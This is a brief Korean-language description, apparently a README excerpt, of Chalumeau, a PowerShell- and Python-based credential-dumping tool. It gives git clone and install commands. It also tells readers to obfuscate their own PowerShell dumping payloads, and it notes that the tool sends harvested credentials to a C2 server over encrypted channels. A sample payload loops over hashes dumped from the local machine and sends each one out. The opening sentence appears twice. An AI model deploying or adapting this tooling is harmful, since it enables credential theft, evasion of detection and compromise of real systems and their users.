
Chalumeau는 powershell과 python을 기반으로 한 자동화되고, 확장 가능하며, 사용자 정의 가능한 자격 증명 덤핑 도구입니다.

Chalumeau는 PowerShell과 Python 기반의 자동화되고 확장 가능하며 사용자 정의 가능한 자격 증명 덤핑 도구입니다.

git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh
# Run
chmod +x start.sh
sudo ./start.sh
자격 증명 덤핑을 위한 자신의 PowerShell 페이로드를 난독화하고 import 없이 chalumeau 함수 호출을 사용하세요. chalumeau는 C2와 통신을 암호화하고 덤프된 자격 증명을 전송합니다. 파일을 chalumeau-power/payloads 아래에 저장하세요.
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
}